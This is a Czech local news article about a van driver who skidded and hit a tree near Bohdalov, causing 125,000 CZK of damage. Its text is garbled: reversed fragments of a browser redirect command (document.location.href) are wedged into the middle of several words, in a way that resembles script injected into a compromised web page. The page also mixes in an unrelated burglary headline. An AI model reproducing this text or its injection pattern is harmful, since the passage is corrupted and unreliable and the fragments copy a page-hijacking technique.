Rainbow page separator

Žena nezvládla smyk a narazila do stromu, škoda je 125 tisíc

Čtvrtek, 30. září 2021

Zloděj ukradl z rodinného domku uniformu, pálenku i hodiny

Bohdalov / Na nezpevněnou krajnici v zatáčce silnice mezi Chrous[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovem a Bohdalovem najela řidička s dodávkovým vozidlem Peugeot Boxer, která tudy projížděla v pátek 24. září po deváté hodině ráno. Sedmačtyřicetiletá žena dostala smyk, který nezvládla, a následně narazila do stromu.
„Vozidlo bylo odhozeno na okraj komunikace. Při dopravní nehodě došlo k lehkému zranění řidičky. Přivolaní policisté provedenou dechovou zkouškou u ženy požití alkoholu vyloučili,“ informovala policejní mluvčí Jana Kroutilová.
Policisté mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dopravní nehody ohledali a událost zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali.
„Na au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu a nákladu vznikla předběžně vyčíslená škoda ve výši 125 tisíc korun. Policisté také zjistili, že řidička nebyla za jízdy připoutána bezpečnostním pásem,“ doplnila policejní mluvčí s tím, nehodu policisté nadále šetří.